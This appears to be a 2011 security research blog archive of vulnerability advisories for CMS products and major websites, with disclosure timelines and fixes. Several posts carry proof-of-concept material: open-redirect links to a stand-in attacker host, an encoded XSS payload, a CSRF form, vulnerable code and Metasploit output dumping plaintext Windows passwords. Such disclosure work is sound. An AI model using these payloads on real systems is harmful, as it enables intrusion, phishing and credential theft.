Posts

Showing posts from 2011

zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability

1. OVERVIEW
The zFTP server is vulnerable to denial of service when handling STAT and CWD commands with overly large buffer requests.
2. BACKGROUND
The zFTP server is a Windows-based FTP server with a focus on clever Active Directory integration and powerful, effortless administration.
3. VERSIONS AFFECTED
2011-04-13 and earlier
4. PROOF-OF-CONCEPT/EXPLOIT
http://www.exploit-db.com/exploits/18028/
5. SOLUTION
The vendor has released a patched version ( http://download.zftpserver.com/zFTPServer_Suite_Setup.exe )
6. VENDOR
Vastgota-Data
7. CREDIT
This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
8. DISCLOSURE TIME-LINE
2011-06-19: notified vendor through email
2011-10-17: vendor released fixed version
2011-10-25: vulnerability disclosed
9. REFERENCES
Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/[zftpserver_2011-04-13]_stat,cwd_dos
zFTP Server Home Page: ...

vTiger CRM 5.2.x | PHP Version Disclosure

How do attackers find out the PHP version when the server has disabled the "X-Powered-By" header (i.e. expose_php = Off)? vTiger CRM has a flaw that discloses the exact PHP version without authentication. An attacker can learn it simply by visiting the following URL without authentication:
/phpversionfail.php
The message shows: "PHP 5.0.x or above is required. Your current PHP version is 5.3 Kindly upgrade the PHP installation, any try again! "
Version Affected: Tested on vTiger CRM 5.2.1

vTiger CRM 5.2.x <= Blind SQL Injection Vulnerability

1. OVERVIEW
vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL Injection. No fixed version has been released as of 2011-10-05.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward and contributing to its development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project, launched on December 31st, 2004.
3. VULNERABILITY DESCRIPTION
The "onlyforuser" parameter was not properly sanitized, which allows an attacker to conduct a Blind SQL Injection attack. This could allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosur...

vTiger CRM 5.2.x <= Remote Code Execution Vulnerability

1. OVERVIEW
vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code Execution. No fixed version has been released as of 2011-10-05.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward and contributing to its development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project, launched on December 31st, 2004.
3. VULNERABILITY DESCRIPTION
vTiger uses a vulnerable version of the phpmailer class file located at /cron/class.phpmailer.php .
4. VERSIONS AFFECTED
Tested on 5.2.1
5. PROOF-OF-CONCEPT/EXPLOIT
File: /cron/class.phpmailer.php
[code]
391: function SendmailSend($header, $bo...

vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW
vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site Scripting. No fixed version has been released as of 2011-10-04.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward and contributing to its development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project, launched on December 31st, 2004.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. VERSION...

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

1. OVERVIEW
Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, extension, asset, author) in Joomla! Core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary...

Advanced Electron Forums (AEF) 1.0.9 <= Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW
Advanced Electron Forums (AEF) versions 1.0.9 and lower are vulnerable to Cross Site Request Forgery (CSRF).
2. BACKGROUND
AEF has a very simple and easy to use Administration Panel, and installing this software is a piece of cake! You can install new themes and customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board.
3. VULNERABILITY DESCRIPTION
Advanced Electron Forums (AEF) versions 1.0.9 and lower contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for the majority of administrator functions, such as adding a new user or assigning administrative privileges to a user. By using a crafted URL, an attacker may trick the victim into visiting his web page to take advantage of the trust relationship between the authenticated...

Hacker Web Search Update

Added some recon searches
Re-arranged some categories
Added OpenSearch sidebar install (right beside the "[about]" link)
Check this out at http://yehg.net/q/

Google: Malware URL Redirection (Google Arbitrary URL Redirect Vulnerability)

The following link will issue a URL Redirect Notice:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fattacker.in%2Fmalware_exists_in_this_page%2F
And this will bypass the notice:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fattacker.in%2Fmalware_exists_in_this_page%2F&usg=AFQjCNEBtpLqGPICIMz5TJZqfNsZKtHbRg
The above bypass link will last as long as Google doesn't change the internal algorithm that compares the hash against the provided URL. In one way, attackers could let the Google search engine crawl their malicious page and calculate the "usg" value on their behalf. In another, they could simply copy the link from the Redirect Notice page, which already contains the calculated "usg" value. The Google Security Team responded that Google blocks known malware URLs and that fixing this issue is unnecessary. Here is how an attacker would bypass Google's carefully monitored URL redirector:
1. Attacker prepares a Proxy link (P1) that r...

Jcow CMS 4.x:4.2 <= , 5.x:5.2 <= | Arbitrary Code Execution

1. OVERVIEW
Jcow CMS versions (4.x: 4.2 and lower, 5.x: 5.2 and lower) are vulnerable to Arbitrary Code Execution.
2. BACKGROUND
Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website, and a social networking site like facebook/myspace/twitter.
3. VULNERABILITY DESCRIPTION
The parameter "attachment" is not properly sanitized upon submission to /index.php, which allows an attacker to execute arbitrary PHP code of his own.
4. VERSIONS AFFECTED
Free version: 4.x: 4.2 and lower
Commercial version: 5.x: 5.2 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb
jcow 4.2.1: file: /includes/libs/ss.inc.php line: 167
$app = $_POST['attachment'];
if (strlen($app) && $app != 'status') {
include_once('modules/'.$app....

Jcow CMS 4.2 <= | Cross Site Scripting

1. OVERVIEW
Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website, and a social networking site like facebook/myspace/twitter.
3. VULNERABILITY DESCRIPTION
The parameter "g" is not properly sanitized upon submission to /index.php, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. VERSIONS AFFECTED
Jcow CMS 4.2 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
File: /includes/libs/member.module.php, Line 605:
http://[target]/index.php?p=member/signup&email=&username=&password=&fullname=&birthyear=1991&birthmonth=01&birthday=01&gender=0&location=Myanmar++&abo...

Concrete CMS 5.4.1.1 <= Cross Site Scripting

1. OVERVIEW
Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Concrete5 makes running a website easy. Go to any page in your site, and an editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click.
3. VULNERABILITY DESCRIPTION
The rcID parameter is not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. VERSIONS AFFECTED
CMS 5.4.1.1 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
vulnerable parameter: rcID
<form action="http://[target]/Concrete/index.php/login/do_login/" method="post">
<input type="hidden" name="uName" value="test" />
<input type="hidden" name="uPasswor...

[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor

http://dev.metasploit.com/redmine/attachments/1642/windows_autologin.rb
This module extracts the plain-text Windows user login password from the Registry. It exploits a Windows feature (Windows 2000 through the current Windows 7) that allows a user or third-party Windows utility tools to configure User AutoLogin by inserting the plain-text password into the (Alt)DefaultPassword value at the registry location HKLM\Software\Microsoft\Windows NT\WinLogon. This location is readable by all users.
meterpreter > run post/windows/gather/credentials/windows_autologin
[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt

Elgg 1.7.10 <= | Multiple Vulnerabilities

1. OVERVIEW
Elgg 1.7.10 and lower versions are vulnerable to Cross Site Scripting and SQL Injection.
2. BACKGROUND
Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php)
3. VULNERABILITY DESCRIPTION
The "internalname" parameter is not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
The "tag_names" parameter is not properly sanitized, which allows an attacker to conduct a SQL Injection att...

WebsiteBaker 2.8.1 <= Arbitrary File Upload Vulnerability

1. OVERVIEW
WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload.
2. BACKGROUND
WebsiteBaker helps you to create the website you want: a free, easy and secure, flexible and extensible open source content management system (CMS). Create new templates within minutes - powered by (X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural that your site is W3C-valid, SEO-friendly and accessible - there are no limitations at all.
3. VULNERABILITY DESCRIPTION
WebsiteBaker 2.8.1 and lower versions contain a flaw related to the /admin/media/upload.php script failing to restrict uploaded files with the extensions .htaccess, .php4, .php5 and .phtml. This may allow an attacker to execute arbitrary PHP code. A user account on the WebsiteBaker admin backend is required. An attacker could gain such access either by brute force or by CSRF against currently logged-in admin users.
4. VERSIONS AFFECTED
2.8.1 and lower
5. SOLUTION
Upgrade to 2.8.2 or high...

WebsiteBaker 2.8.1 <= Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW
WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request Forgery (CSRF).
2. BACKGROUND
WebsiteBaker is a PHP-based Content Management System (CMS) designed with one goal in mind: to enable its users to produce websites with ease.
3. VULNERABILITY DESCRIPTION
WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for the majority of administrator functions, such as adding a new user. By using a crafted URL, an attacker may trick the victim into visiting his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification.
4. VERSIONS AFFEC...

Mambo CMS 4.6.x (4.6.5) | SQL Injection

1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
3. VULNERABILITY DESCRIPTION
The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php URL, which allows an attacker to conduct a SQL Injection attack. This could allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5
5. PR...

[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd

http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________
hp_printer_pjl_traversal:
This module exploits a path traversal issue in possibly all HP network-enabled printer series, especially those which enable the Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
msf auxiliary(hp_printer_pjl_traversal) > show options
Module options (auxiliary/admin/hp_printer_pjl_traversal):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   INTERACTIVE  true             no        Enter interactive mode [msfconsole Only]
   RHOST        202.138.16.21    yes       The target address
   RPATH        /hp              yes       The remote filesystem path to browse or read
   RPORT        9100             yes       The target port
msf ...

Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW
Elgg 1.7.9 and lower versions are vulnerable to multiple Cross Site Scripting issues.
2. BACKGROUND
Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php)
3. VULNERABILITY DESCRIPTION
Several parameters (page_owner, content, internalname, QUERY_STRING) are not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. VERSIONS AFFECTED
Elgg 1.7.9
REQUEST: http://localhost/elgg...

[whatweb] updated ./plugin-development/get-pattern

https://github.com/yehgdotnet/whatweb-plugins/blob/master/plugin-development/get-pattern
Added server, cookie and www-authenticate headers in /plugin-development/get-pattern
$ ./get-pattern http://demo.phpmyadmin.net/master/
== Page Pattern Generator 0.1 for WhatWeb ==
   by Aung Khant, http://yehg.net
URL: http://demo.phpmyadmin.net/master/
{:name=>'Page MD5', :md5=>'619ef6970f8609c42b944ea776734663'},
{:name=>'HTML Tag Pattern', :tagpattern=>'!doctype,html,head,meta,link,link,title,/title,link,link,link,meta,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,/head,body,script,/script,div,h1,/h1,a,/a,/div,div,a,img,/a,h1,bdo,/bdo,/h1,form,input,input,input,input,input,input,fieldset,input,legend,/legend,select,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,...

[whatweb] new plugins - MapServer & HopfTimeServer

https://github.com/yehgdotnet/whatweb-plugins/blob/master/new-plugins/MapServer.rb
$ ./whatweb --follow-redirect=same-domain -a 4 -v -p MapServer http://demo.mapserver.org/
demo.mapserver.org/cgi-bin/mapserv/?map=* [200]
http://demo.mapserver.org [200] MapServer[Invalid Map Parameter Detection,Version - 5.6.5 ]
https://github.com/yehgdotnet/whatweb-plugins/blob/master/new-plugins/HopfTimeServer.rb
$ ./whatweb --follow-redirect=same-domain -a 4 -v -p HopfTimeServer http://www.timesync.eu/
www.timesync.eu/ [200]
www.timesync.eu/cgi-bin/main.cgi?ntp&0 [200]
www.timesync.eu/cgi-bin/main.cgi?ntp&0 [200]
http://www.timesync.eu/ [200] HopfTimeServer[Generic Version - 727x,Version - 727100]
...

Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities (CVE-2011-2710)

1. OVERVIEW
Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple Cross Site Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, Request URI) in Joomla! Core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially craf...

Updated ssl-enum-ciphers.nse with sslenum=weak option

The original ssl-enum-ciphers script was modified so that it returns only the list of known weak algorithms when run with the sslenum=weak option. With that option, only the following known weak ciphers will be tested.
$ nmap --script ssl-enum-ciphers --script-args sslenum=weak -p 443 <host>
@output
| ssl-enum-ciphers:
|   SSLv3
|     Weak Ciphers (6)
|       TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|       TLS_DHE_RSA_WITH_DES_CBC_SHA
|       TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
|       TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
|       TLS_RSA_EXPORT_WITH_RC4_40_MD5
|       TLS_RSA_WITH_DES_CBC_SHA
|     Compressors (1)
|       uncompressed
link: http://yehg.net/lab/pr0js/tools/plugins/nmap/ssl-enum-ciphers.nse

MyST BlogSite | Multiple Vulnerabilities

1. VULNERABILITY DESCRIPTION
--> Issue Title: Arbitrary URL Redirect
Component: MyST BlogSite ClickDirector
Ref: OWASP - Top 10 - 2010 - A10
Ref-Link: https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
Proof-Of-Concept:
http://blogsite.com/public/click/~sites/attacker.in/malware_exists_in_this_page/
http://blog.cenzic.com/public/click/~sites/attacker.in/malware_exists_in_this_page/ [FIXED]
--> Issue Title: Information Leakage
Ref: WASC-13
Ref-Link: http://projects.webappsec.org/w/page/13246936/Information-Leakage
This could be used to brute force (http://blogsite.com/login)
Proof-Of-Concept:
http://blogsite.com/public/mostl/1
http://blogsite.com/public/mostl/2
http://blogsite.com/public/my-account/1
http://blogsite.com/public/my-account/2
http://blogsite.com/public/object/1
http://blo...

[Metasploit] Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Version: 5.0 - 7.0
# Tested on: unpatched versions of Windows XP, 2k3, & Vista Enterprise
http://dev.metasploit.com/redmine/attachments/1427/iis567_ftpd_stackexhaust.rb
This module triggers a denial-of-service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need:
1) a valid FTP account, either read-only or with write access
2) the "FTP Publishing" service configured with the "manual" startup type
3) at least one directory under the FTP root directory. If the provided FTP account has write-access privilege and there is no directory at all, a new directory with a random name will be created prior to sending the exploit payload.
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanm...

Vulnerabilities in developer.apple.com

1. VULNERABILITY DESCRIPTION
Arbitrary URL Redirect
======================
POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page
Issue References:
OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 - http://cwe.mitre.org/data/definitions/601.html
Cross Site Scripting (XSS) Via Arbitrary URL Redirect
=====================================================
POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D
Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html
HTTP Response Splitting (HRS) Via Arbitrary URL Redirect
=====================================================...

[metasploit] TYPSoft FTP Server 1.1 RETR Denial of Service

http://dev.metasploit.com/redmine/attachments/1317/typsoft11_retr.rb
Module Category: modules/auxiliary/dos/windows/ftp
This module triggers a Denial of Service in the TYPSoft FTP Server 1.1 and earlier by issuing multiple "RETR" command requests.
Software Link: http://www.softpedia.com/get/Internet/Servers/FTP-Servers/TYPSoft-FTP-Server.shtml

Full Path Disclosure | Joomla! 1.6.3 and lower (parameters: limitstart, limit , component: com_content)

SEO Mode On
===========
http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limitstart=-1
http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limit=-1&limitstart=1
SEO Mode Off
============
http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=-5&view=archive&option=com_content&limitstart=1
http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=5&view=archive&option=com_content&limitstart=-1

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

1. OVERVIEW
The smallftpd FTP server is vulnerable to denial of service when handling multiple connection requests, regardless of its maximum connection settings. Upon a successful DoS exploit, smallftpd will crash or reject new FTP login requests.
2. BACKGROUND
The smallftpd FTP server is a small and simple multi-threaded FTP server for Windows.
3. VERSIONS AFFECTED
1.0.3-fix and earlier
4. PROOF-OF-CONCEPT/EXPLOIT
http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb
http://www.exploit-db.com/download/17455
5. SOLUTION
The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.
6. VENDOR
Arnaud Mary
7. CREDIT
This vulnerability was discovered by Myo Soe, http://yehg.net , YGN Ethical Hacker Group, Myanmar.
8. REFERENCES
Original Advisor...

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

1. OVERVIEW
Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct Cross Site Script...

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
3. VULNERABILITY DESCRIPTION
Multiple parameters (task, menu, menutype, zorder, search, client, section) are not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5 (current as...

Updated: Ultimate Recon

http://yehg.net/lab/pr0js/misc/wsa.php
Added: lynxview, list-urls, keywords, whatweb, Full Disclosure, BugTraq

java.com | Arbitrary URL Redirect Vulnerability

1. VULNERABILITY DESCRIPTION
- Arbitrary URL Redirect
http://java.com/inc/BrowserRedirect1.jsp?locale=en&host=attacker.in
Demo: http://yehg.net/lab/pr0js/training/view/misc/java.com_Arbitrary_URL_Redirect/
2. VENDOR
Oracle Inc
http://www.oracle.com
3. VULNERABILITY STATUS
FIXED
4. DISCLOSURE TIME-LINE
2011-04-19: reported to vendor
2011-04-23: vendor fixed the issue
2011-04-24: vulnerability disclosed
5. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/java.com/[java.com]_url_redirection
OWASP-Top-10_2010-A10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SANS-TOP-23: http://www.sans.org/top25-software-errors/
CWE-601: http://cwe.mitre.org/data/definitions/601.html
#yehg [2011-04-24]

Joomla! 1.6.1 and lower | Information Disclosure & ClickJacking vulnerabilities

Information Disclosure > Full Path
Proof-of-Concept: http://attacker.in/joomla161/index.php?Itemid[]=
ClickJacking
Proof-of-Concept: http://yehg.net/lab/pr0js/pentest/cross_site_framing.php?url=http://attacker.in/joomla161/administrator
Vendor References:
http://developer.joomla.org/security/news/347-20110409-core-clickjacking.html
http://developer.joomla.org/security/news/341-20110402-core-information-disclosure.html

Vulnerabilities in *McAfee.com

1. VULNERABILITY DESCRIPTION
-> Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('http://attacker.in ')
-> Information Disclosure > Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js )
-> Information Disclosure > Source Code Disclosure:
view-source: http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source: http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source: http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source: http://download.mcafee.com/clinic/Includes/common.asp
view-source: http://download.mcafee.com/updates/upgrade_patches.asp
view-source: http://download.mcafee.com/updates/common/dat_common.asp
view-source: http://download.mcafee.com/updates/updates.asp
view-source: ...